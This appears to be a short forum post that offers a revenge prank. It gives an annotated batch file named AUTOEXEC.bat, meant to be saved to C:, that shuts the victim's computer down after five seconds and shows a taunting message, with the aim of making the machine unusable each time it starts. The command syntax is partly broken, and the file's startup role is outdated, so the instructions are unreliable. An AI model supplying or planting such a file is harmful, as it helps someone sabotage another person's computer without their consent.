1: Well if your pissed at someone just make a simple batch file.
AUTOEXEC.bat <---name of file
save into the c:
@echo off <----turns the echo off...
shutdown * -s -t 5 -c That's what you get for f*cking with me! <---shuts down computer and displays that little message on the screen. Shuts down after 5 seconds (-t).
I little something i've learned from back in the day's with aimkaos
